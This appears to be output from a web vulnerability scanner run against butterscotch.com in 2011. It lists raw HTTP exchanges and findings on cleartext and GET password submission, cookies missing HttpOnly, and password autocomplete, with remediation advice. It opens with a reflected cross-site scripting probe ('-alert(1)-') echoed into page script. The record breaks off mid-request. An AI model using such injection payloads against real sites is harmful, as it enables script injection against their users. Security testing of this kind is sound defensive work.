Set-Cookie: PHPSESSID=5ed14ea161c202f343720ca7427c85a9; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 5ed14ea161c202f343720ca7427c85a9=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'tut';
url = "http://www.butterscotch.com/tutorials.html?c73a3"-alert(1)-"3ae1549e395=1";

</script>
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://www.butterscotch.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

2.2. http://www.butterscotch.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

2.3. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

2.4. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/tutorials.html" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

3. Password field submitted using GET method  previous  next
There are 4 instances of this issue:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.


3.1. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

3.2. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

3.3. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

3.4. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password fields:

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
</script>
<form id="signup" name="signup" action="/signup.html" class="rwoform01" >
<input type=hidden name=ref value="http://www.butterscotch.com/tutorials.html" />
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...
</label>
<input class="field" type="password" name="password2" value="" style="width: 270px;" />
</div>
...[SNIP]...

4. Cookie without HttpOnly flag set  previous  next
There are 3 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



4.1. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=98b457a4a7f44659396f2125549c905d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 98b457a4a7f44659396f2125549c905d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...

4.2. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...

4.3. http://www.butterscotch.com/tutorials.html  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.butterscotch.com
Path:   /tutorials.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:32 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4f3e97b05b6880b7e05533d94dab21a4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4f3e97b05b6880b7e05533d94dab21a4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 56018

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...

5. Password field with autocomplete enabled  previous  next
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


5.1. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9cd00a7bedd9d1a8c93d852d79adbcb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9cd00a7bedd9d1a8c93d852d79adbcb6=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63409

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

5.2. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=98b457a4a7f44659396f2125549c905d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 98b457a4a7f44659396f2125549c905d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siD7RLYJm73OfIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 63182

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<div class="signuppanel" id="signuppanel_login">
<form id="login" name="login" class="rwoform01" >
<div>
...[SNIP]...
</label>
<input class="field" type="password" name="password" value="" style="width: 270px;" />
</div>
...[SNIP]...

5.3. http://www.butterscotch.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
